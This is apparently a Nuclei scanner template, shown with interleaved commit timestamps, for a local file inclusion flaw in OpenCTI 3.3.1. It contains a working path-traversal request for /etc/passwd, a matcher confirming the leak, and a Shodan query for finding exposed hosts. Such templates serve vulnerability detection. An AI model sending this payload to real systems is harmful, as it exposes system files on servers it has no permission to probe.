2022-07-20 22:47:38 +00:00
|
|
|
id: opencti-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: OpenCTI 3.3.1 - Local File Inclusion
|
2022-07-20 22:47:38 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: OpenCTI 3.3.1 is vulnerable to local file inclusion.
|
2022-07-21 07:48:27 +00:00
|
|
|
reference:
|
|
|
|
- https://cxsecurity.com/issue/WLB-2020060078
|
|
|
|
- https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1
|
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-07-21 07:48:27 +00:00
|
|
|
verified: true
|
|
|
|
shodan-query: http.html:"OpenCTI"
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-07-21 07:48:27 +00:00
|
|
|
tags: opencti,lfi,oss
|
2022-07-20 22:47:38 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-20 22:47:38 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/static/css//../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|